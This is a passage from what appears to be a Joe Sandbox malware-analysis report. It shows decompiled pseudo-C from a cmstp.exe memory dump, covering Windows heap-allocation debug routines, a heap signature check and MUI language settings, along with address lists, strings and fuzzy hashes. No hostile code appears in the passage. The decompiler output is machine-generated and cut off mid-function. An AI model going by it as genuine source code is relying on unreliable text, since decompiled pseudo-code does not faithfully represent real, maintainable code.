								__eflags = _t105 & 0x00000800;
								if((_t105 & 0x00000800) == 0) {
									goto L49;
								}
								_t106 =  *(_t182 - 0x34);
								__eflags = _t106;
								if(_t106 == 0) {
									goto L49;
								}
								__eflags = _t106 -  *0x51c6364; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x51c6366; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								_t108 =  *[fs:0x30];
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E050DB150();
								} else {
									E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E0517D455(_t181,  *(_t182 - 0x28)));
								_push( *(_t182 + 8));
								E050DB150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
								goto L34;
							} else {
								__eflags =  *(_t104 + 0xc);
								if( *(_t104 + 0xc) == 0) {
									_push("HEAP: ");
									E050DB150();
								} else {
									E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t182 + 8));
								E050DB150("Just allocated block at %p for %Ix bytes\n",  *0x51c6360);
								L34:
								_t112 =  *[fs:0x30];
								__eflags =  *((char*)(_t112 + 2));
								if( *((char*)(_t112 + 2)) != 0) {
									 *0x51c6378 = 1;
									 *0x51c60c0 = 0;
									asm("int3");
									 *0x51c6378 = 0;
								}
								goto L49;
							}
						}
					}
				} else {
					_t181 =  *0x51c5708; // 0x0
					 *0x51cb1e0(__ecx, __edx,  *(_t182 + 8));
					 *_t181();
					L50:
					return E0512D130(0, _t177, _t181);
				}
			}

0x05192d82
0x05192d84
0x05192d89
0x05192d8e
0x05192d90
0x05192d92
0x05192d97
0x05192d9a
0x05192da4
0x05192dc0
0x05192dc3
0x05192dd1
0x05192dd6
0x05192dd8
0x051930a7
0x051930a7
0x051930aa
0x051930aa
0x051930ad
0x051930b4
0x00000000
0x051930b9
0x05192de3
0x05192de8
0x05192deb
0x05192dee
0x05192df1
0x05192df3
0x05192dfb
0x05192dfb
0x05192df5
0x05192df5
0x05192df5
0x05192e04
0x05192e0a
0x05192e0d
0x05192e11
0x05192e11
0x05192e12
0x05192e15
0x05192e18
0x05192e1a
0x05193027
0x05193027
0x0519302d
0x05193030
0x0519304f
0x05193054
0x05193032
0x05193047
0x0519304c
0x0519305a
0x05193063
0x00000000
0x05192e20
0x05192e20
0x05192e23
0x00000000
0x00000000
0x05192e29
0x05192e2b
0x05192e47
0x05192e2d
0x05192e33
0x05192e38
0x05192e3f
0x05192e42
0x05192e42
0x05192e4e
0x05192e5d
0x05192e5f
0x05192e62
0x05192e66
0x05192e6b
0x05192e6d
0x00000000
0x05192e73
0x05192e73
0x05192e76
0x05192e7a
0x05192e83
0x05192e83
0x05192e83
0x05192e85
0x05192e87
0x05192e8a
0x05192e8d
0x05192e92
0x05192e9c
0x05192e9f
0x05192ea1
0x05192ea2
0x05192ea6
0x05192ea6
0x05192e9f
0x05192eab
0x05192eaf
0x05192edf
0x05192ee2
0x05192ee5
0x05192eb1
0x05192eb3
0x05192eb8
0x05192ebd
0x05192ec4
0x05192ed6
0x05192ec6
0x05192ec7
0x05192ecc
0x05192ecf
0x05192ed2
0x05192ed2
0x05192ed9
0x05192ed9
0x05192ee8
0x05192eeb
0x05192eef
0x05192ef2
0x05192efe
0x05192f04
0x05192f04
0x05192f04
0x05192f06
0x05192f0d
0x05192f0f
0x05192f13
0x05192f13
0x05192f1b
0x05192f21
0x05192f27
0x05192f95
0x05192f98
0x05192f9b
0x05192fa0
0x00000000
0x00000000
0x05192fa6
0x05192fa9
0x05192fac
0x00000000
0x00000000
0x05192fb2
0x05192fb9
0x00000000
0x00000000
0x05192fc3
0x05192fca
0x00000000
0x00000000
0x05192fd0
0x05192fd6
0x05192fd9
0x05192ff8
0x05192ffd
0x05192fdb
0x05192ff0
0x05192ff5
0x0519300e
0x0519300f
0x0519301a
0x00000000
0x05192f29
0x05192f29
0x05192f2c
0x05192f4b
0x05192f50
0x05192f2e
0x05192f43
0x05192f48
0x05192f56
0x05192f64
0x05192f6c
0x05192f6c
0x05192f72
0x05192f76
0x05192f7c
0x05192f83
0x05192f89
0x05192f8a
0x05192f8a
0x00000000
0x05192f76
0x05192f27
0x05192e6d
0x05192da6
0x05192dab
0x05192db3
0x05192db9
0x051930bc
0x051930c1
0x051930c1

Strings

Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 05193015
RtlAllocateHeap, xrefs: 05192DCA
Just allocated block at %p for %Ix bytes, xrefs: 05192F5F
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 0519305E
HEAP[%wZ]: , xrefs: 05192F3E, 05192FEB, 05193042
HEAP: , xrefs: 05192F4B, 05192FF8, 0519304F

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 0-1745908468
Opcode ID: eee6d40e75edead1f235ea79618111c54c0381ce99b64cc16d80a58d31f552c7
Instruction ID: 49dd78e5739518a5c53d9713d5da04945d3c791a37f8a365044a7b74a2699ffd
Opcode Fuzzy Hash: eee6d40e75edead1f235ea79618111c54c0381ce99b64cc16d80a58d31f552c7
Instruction Fuzzy Hash: BD912339610640EFDF29DF68D488AEDBFF2FF89600F19845CE4569B291C7769882CB11

Uniqueness

Uniqueness Score: -1.00%

Function 050E3D34 Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E050E3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E050E1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E050E1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E050E1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E050E1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E050E1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L050F4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0511F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E05121370(_t276, 0x50b4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0511BB40(0,  &_v68, _t170);
									if(L050E43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0511BB40(_t257,  &_v68, _t243);
								if(L050E43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E05121370(_t278, 0x50b4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L050F4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0511F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E05121370(_v16, 0x50b4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0511BB40(_t262,  &_v68, _t244);
								if(L050E43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E05121370(_t282, 0x50b4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0511BB40(_t262,  &_v68, _t201);
							if(L050E43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L050F4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0511F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E05121370(_t280, 0x50b4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0511BB40(_t267,  &_v68, _t245);
							if(L050E43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E05121370(_t284, 0x50b4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0511BB40(_t267,  &_v68, _t224);
						if(L050E43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x050e3d3c
0x050e3d42
0x050e3d44
0x050e3d46
0x050e3d49
0x050e3d4c
0x050e3d4f
0x050e3d52
0x050e3d55
0x050e3d58
0x050e3d5b
0x050e3d5f
0x050e3d61
0x050e3d66
0x05138213
0x05138218
0x050e4085
0x050e4088
0x050e408e
0x050e4094
0x050e409a
0x050e40a0
0x050e40a6
0x050e40a9
0x050e40af
0x050e40b6
0x050e40bd
0x050e40bd
0x050e3d83
0x0513821f
0x05138229
0x05138238
0x05138238
0x0513823d
0x0513823d
0x050e3da0
0x050e3daf
0x050e3db5
0x050e3dba
0x050e3dba
0x050e3dd4
0x050e3e94
0x050e3eab
0x050e3f6d
0x050e3f84
0x050e406b
0x050e406b
0x050e406e
0x050e406e
0x050e4070
0x050e4074
0x05138351
0x05138351
0x050e407a
0x050e407f
0x0513835d
0x05138370
0x05138377
0x05138379
0x0513837c
0x0513837c
0x0513835d
0x00000000
0x050e407f
0x050e3f8a
0x050e3f8d
0x050e3f90
0x050e3f95
0x0513830d
0x0513830f
0x050e3f9b
0x050e3fac
0x050e3fae
0x050e3fb1
0x050e3fb1
0x050e3fb6
0x05138317
0x0513831a
0x00000000
0x050e3fbc
0x050e3fc1
0x050e3fc9
0x050e3fd7
0x050e3fda
0x050e3fdd
0x050e4021
0x050e4021
0x050e4029
0x050e4030
0x050e4044
0x050e4046
0x050e4046
0x050e4044
0x050e4049
0x05138327
0x05138334
0x05138339
0x0513833c
0x050e404f
0x050e404f
0x050e404f
0x050e4051
0x050e4056
0x050e4063
0x050e4063
0x050e4068
0x00000000
0x050e4068
0x050e3fdf
0x050e3fe2
0x050e3fe4
0x050e3fe7
0x050e3fef
0x050e4003
0x050e4005
0x050e4005
0x050e400c
0x050e4013
0x050e4016
0x050e4017
0x050e401b
0x050e401e
0x00000000
0x050e401e
0x050e3fb6
0x050e3eb1
0x050e3eb4
0x050e3eb7
0x050e3ebc
0x051382a9
0x051382ab
0x050e3ec2
0x050e3ed3
0x050e3ed5
0x050e3ed8
0x050e3ed8
0x050e3edd
0x051382b3
0x051382b6
0x00000000
0x050e3ee3
0x050e3ee8
0x050e3eed
0x050e3ef0
0x050e3ef3
0x050e3f02
0x050e3f05
0x050e3f08
0x051382c0
0x051382c3
0x051382c5
0x051382c8
0x051382d0
0x051382e4
0x051382e6
0x051382e6
0x051382ed
0x051382f4
0x051382f7
0x051382f8
0x051382fc
0x051382ff
0x051382ff
0x050e3f0e
0x050e3f11
0x050e3f16
0x050e3f1d
0x050e3f31
0x05138307
0x05138307
0x050e3f31
0x050e3f39
0x050e3f48
0x050e3f4d
0x050e3f50
0x050e3f50
0x050e3f53
0x050e3f58
0x050e3f65
0x050e3f65
0x050e3f6a
0x00000000
0x050e3f6a
0x050e3edd
0x050e3dda
0x050e3ddd
0x050e3de0
0x050e3de5
0x05138245
0x050e3deb
0x050e3df7
0x050e3dfc
0x050e3dfe
0x050e3e01
0x050e3e01
0x050e3e06
0x0513824d
0x0513824f
0x05138254
0x00000000
0x050e3e0c
0x050e3e11
0x050e3e16
0x050e3e19
0x050e3e29
0x050e3e2c
0x050e3e2f
0x0513825c
0x0513825f
0x05138261
0x05138264
0x0513826c
0x05138280
0x05138282
0x05138282
0x05138289
0x05138290
0x05138293
0x05138294
0x05138298
0x0513829b
0x0513829b
0x050e3e35
0x050e3e38
0x050e3e3d
0x050e3e44
0x050e3e58
0x051382a3
0x051382a3
0x050e3e58
0x050e3e60
0x050e3e6f
0x050e3e74
0x050e3e77
0x050e3e77
0x050e3e7a
0x050e3e7f
0x050e3e8c
0x050e3e8c
0x050e3e91
0x00000000
0x050e3e91

Strings

Kernel-MUI-Language-SKU, xrefs: 050E3F70
Kernel-MUI-Language-Disallowed, xrefs: 050E3E97
Kernel-MUI-Number-Allowed, xrefs: 050E3D8C
WindowsExcludedProcs, xrefs: 050E3D6F
Kernel-MUI-Language-Allowed, xrefs: 050E3DC0

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 9c7f073efb748be577bbe046004386559793a15054dd038e80c4d79460bf1cd2
Instruction ID: 3646a4cec039f5ddf1f535d7d05d7bd1481df208ff1fbf28a09014d52593273e
Opcode Fuzzy Hash: 9c7f073efb748be577bbe046004386559793a15054dd038e80c4d79460bf1cd2
Instruction Fuzzy Hash: D8F16F72E05218EFCF11DF98D984EEEBBB9FF48650F15006AE905A7211D774AE01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 050D40E1 Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E050D40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E050DB150();
					} else {
						E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E050DB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E050DB150(", passed to %s", _t29);
					}
					_push("\n");
					E050DB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x51c6378 = 1;
						asm("int3");
						 *0x51c6378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x050d40e6
0x050d40e8
0x050d40f1
0x0513042d
0x0513044c
0x05130451
0x0513042f
0x05130444
0x05130449
0x0513045d
0x05130466
0x0513046e
0x05130474
0x05130475
0x0513047a
0x0513048a
0x0513048c
0x05130493
0x05130494
0x05130494
0x00000000
0x0513049b
0x00000000

Strings

RtlAllocateHeap, xrefs: 05130468
Invalid heap signature for heap at %p, xrefs: 05130458
HEAP[%wZ]: , xrefs: 0513043F
, passed to %s, xrefs: 05130469
HEAP: , xrefs: 0513044C

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: f76f601534ef52bec5701a13e00f9648c522ce8c15ee4eaf1bb18a0f8ec21e97
Instruction ID: f59b76249d6ffd9f3acb2801dd36f45f29e26f2e10d50cd02294fabdbd05f422
Opcode Fuzzy Hash: f76f601534ef52bec5701a13e00f9648c522ce8c15ee4eaf1bb18a0f8ec21e97
Instruction Fuzzy Hash: BD01D8362143419EE3399768B45EFDABBF4EB45B30F2A806DF0095B681CBF59880D925

Uniqueness

Uniqueness Score: -1.00%

Function 050F5600 Relevance: 6.2, Strings: 3, Instructions: 2418
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E050F5600(signed char __ecx, signed int __edx, signed int _a4, unsigned int _a8, intOrPtr* _a12, signed char* _a16) {
				signed char _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				char _v53;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				char _v69;
				char _v70;
				signed char _v71;
				char _v72;
				char _v73;
				signed int _v80;
				signed int _v88;
				signed short _v92;
				signed char _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				char _v109;
				char _v110;
				signed int _v111;
				char _v112;
				signed char _v116;
				signed int _v120;
				signed char _v128;
				signed short _v132;
				signed short _v134;
				signed short _v136;
				signed short _v138;
				signed int _v144;
				signed char _v148;
				signed char _v152;
				signed short _v156;
				signed int _v160;
				signed short _v164;
				signed short _v166;
				signed int _v172;
				signed char _v176;
				signed char _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed char _v200;
				char _v204;
				signed int _v206;
				signed char _v212;
				intOrPtr _v216;
				signed int _v220;
				unsigned int* _v224;
				intOrPtr _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed char _v248;
				unsigned int* _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed char _v276;
				signed char _v280;
				intOrPtr _v284;
				signed int* _v288;
				signed int _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed short _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				intOrPtr _v340;
				signed char _v344;
				signed char _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				unsigned int _v372;
				unsigned int _v380;
				unsigned int _v388;
				unsigned int _v396;
				unsigned int _v404;
				unsigned int _v412;
				unsigned int _v420;
				unsigned int _v428;
				unsigned int _v436;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t1068;
				signed char _t1072;
				signed int _t1073;
				intOrPtr _t1075;
				signed int _t1078;
				char* _t1079;
				signed int _t1097;
				signed char* _t1100;
				intOrPtr _t1101;
				signed int _t1102;
				signed char* _t1105;
				intOrPtr _t1106;
				signed int _t1107;
				signed char* _t1110;
				signed char* _t1112;
				signed int _t1120;
				void* _t1127;
				signed char* _t1137;
				intOrPtr* _t1145;
				signed int _t1147;
				intOrPtr _t1148;
				void* _t1149;
				signed int _t1151;
				signed char _t1153;
				signed int _t1158;
				signed int _t1159;
				signed char _t1179;
				signed char _t1180;
				unsigned int _t1182;
				signed char _t1192;
				signed char _t1193;
				char _t1205;
				signed char _t1209;
				signed short _t1211;
				void* _t1212;
				signed int _t1217;
				signed int _t1218;
				signed char _t1219;
				signed int _t1221;
				intOrPtr* _t1227;
				intOrPtr* _t1228;
				signed int _t1235;
				signed int _t1236;
				intOrPtr* _t1244;
				intOrPtr* _t1246;
				signed int _t1249;
				signed int _t1253;
				signed int _t1255;
				intOrPtr _t1261;
				signed int _t1267;
				signed int _t1269;
				intOrPtr* _t1281;
				intOrPtr* _t1282;
				signed int _t1285;
				signed int* _t1289;
				signed int* _t1291;
				intOrPtr _t1294;
				signed int _t1295;
				signed int _t1301;
				signed int* _t1302;
				signed int _t1303;
				intOrPtr _t1308;
				signed short _t1309;
				intOrPtr _t1315;
				signed int _t1316;
				intOrPtr _t1318;
				signed int* _t1319;
				signed int _t1320;
				signed int* _t1323;
				signed int _t1324;
				unsigned int* _t1333;
				signed int _t1336;
				signed int _t1338;
				signed int _t1341;
				signed int _t1347;
				signed int* _t1348;
				signed int _t1349;
				signed short _t1352;
				signed short _t1358;
				signed short _t1364;
				signed int _t1373;
				intOrPtr _t1379;
				intOrPtr _t1384;
				intOrPtr* _t1392;
				signed int _t1393;
				signed int _t1396;
				signed int _t1397;
				intOrPtr _t1399;
				signed int _t1401;
				signed char _t1403;
				signed int _t1405;
				signed int _t1406;
				intOrPtr _t1408;
				signed int* _t1410;
				signed int _t1411;
				signed short _t1414;
				signed int* _t1424;
				signed int _t1425;
				signed int* _t1428;
				signed int _t1429;
				signed int _t1432;
				signed int _t1434;
				signed int _t1438;
				signed short _t1440;
				signed short _t1447;
				signed short _t1453;
				intOrPtr* _t1459;
				signed char _t1460;
				void* _t1461;
				signed int _t1465;
				signed int _t1466;
				intOrPtr _t1469;
				signed int _t1471;
				signed char _t1473;
				signed int _t1475;
				signed int _t1476;
				signed char _t1477;
				intOrPtr _t1479;
				signed int* _t1481;
				signed int _t1482;
				signed short _t1485;
				signed int _t1496;
				signed int _t1504;
				signed int _t1506;
				signed int _t1518;
				unsigned int _t1521;
				intOrPtr _t1522;
				signed int _t1523;
				signed int _t1524;
				signed int _t1525;
				signed char _t1526;
				signed short _t1527;
				signed int _t1529;
				unsigned int _t1535;
				signed int _t1538;
				signed short _t1539;
				signed int _t1559;
				signed int _t1564;
				signed char _t1565;
				signed char _t1566;
				signed char _t1567;
				signed char _t1569;
				signed int _t1571;
				signed char _t1576;
				signed short* _t1577;
				signed char _t1579;
				intOrPtr* _t1581;
				signed int _t1583;
				intOrPtr* _t1586;
				intOrPtr _t1590;
				signed int _t1594;
				signed char _t1599;
				intOrPtr* _t1601;
				signed int _t1604;
				signed int _t1605;
				signed int _t1606;
				signed int _t1608;
				signed char _t1614;
				signed short _t1617;
				signed int _t1619;
				signed short _t1620;
				signed int _t1622;
				unsigned int _t1628;
				signed short _t1632;
				signed int _t1634;
				signed char _t1638;
				signed char _t1643;
				signed char _t1648;
				intOrPtr _t1651;
				signed int _t1654;
				signed int _t1656;
				signed int _t1657;
				signed char _t1658;
				signed char _t1660;
				signed char _t1668;
				signed short _t1671;
				intOrPtr _t1673;
				signed short _t1674;
				intOrPtr _t1676;
				signed int _t1678;
				signed int _t1681;
				signed int _t1682;
				signed int _t1686;
				signed short _t1689;
				signed int _t1691;
				signed char _t1695;
				signed char _t1700;
				signed char _t1705;
				signed int _t1707;
				intOrPtr _t1708;
				signed int _t1709;
				signed int _t1710;
				signed char _t1712;
				signed char _t1719;
				signed int* _t1723;
				signed int _t1724;
				signed int _t1725;
				unsigned int _t1728;
				signed int _t1729;
				signed int _t1730;
				signed char* _t1734;
				signed int _t1736;
				intOrPtr* _t1738;
				signed int _t1740;
				signed int _t1743;
				unsigned int _t1744;
				intOrPtr _t1753;
				signed char _t1754;
				signed short* _t1755;
				signed short* _t1757;
				unsigned int _t1760;
				intOrPtr _t1763;
				signed int _t1765;
				signed short _t1766;
				signed short _t1768;
				void* _t1769;
				signed int _t1771;
				signed int _t1773;
				signed int _t1775;
				unsigned int _t1781;
				signed int _t1784;
				signed int _t1785;
				signed int _t1787;
				signed int _t1789;
				unsigned int _t1791;
				unsigned int _t1795;
				unsigned int _t1799;
				signed int _t1802;
				intOrPtr* _t1803;
				signed short* _t1805;
				signed int _t1807;
				intOrPtr _t1809;
				signed short _t1811;
				signed short _t1813;
				intOrPtr _t1814;
				signed char _t1820;
				void* _t1821;
				signed int _t1825;
				signed char _t1829;
				unsigned int _t1831;
				unsigned int* _t1836;
				unsigned int _t1838;
				unsigned int _t1842;
				unsigned int _t1846;
				signed int _t1852;
				signed int _t1858;
				unsigned int _t1861;
				signed int _t1866;
				intOrPtr _t1868;
				signed char _t1871;
				void* _t1873;
				signed int _t1876;
				signed int _t1877;
				signed int _t1880;
				signed char _t1881;
				signed int _t1882;
				signed int _t1883;
				signed short _t1885;
				signed short* _t1886;
				signed char _t1887;
				signed char _t1888;
				signed int* _t1889;
				intOrPtr _t1890;
				signed int _t1892;
				intOrPtr* _t1893;
				signed int _t1894;
				signed int _t1895;
				signed int _t1896;
				signed int _t1897;
				signed int _t1900;
				signed int _t1904;
				signed int _t1905;
				signed int _t1906;
				intOrPtr _t1907;
				signed int _t1908;
				signed int _t1910;
				signed int _t1911;
				signed int _t1912;
				unsigned int _t1916;
				signed int _t1917;
				void* _t1921;
				intOrPtr _t1922;
				intOrPtr _t1923;
				signed int _t1924;
				signed int _t1926;
				signed int _t1927;
				signed int _t1928;
				unsigned int _t1931;
				signed int _t1932;
				signed int* _t1933;
				intOrPtr _t1934;
				signed int _t1935;
				void* _t1936;
				void* _t1937;
				void* _t1940;
				void* _t1941;
				signed int _t1946;
				void* _t1952;

				_t1725 = __edx;
				_t1540 = __ecx;
				_push(0xfffffffe);
